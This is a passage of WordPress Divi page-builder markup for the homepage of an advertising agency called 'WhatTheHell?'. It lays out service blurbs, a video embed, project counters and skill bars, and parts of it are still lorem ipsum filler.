farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" alt=\"Video digital advertising\" title_text=\"Screenshot 2020-07-19 at 2.05.17 AM\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" 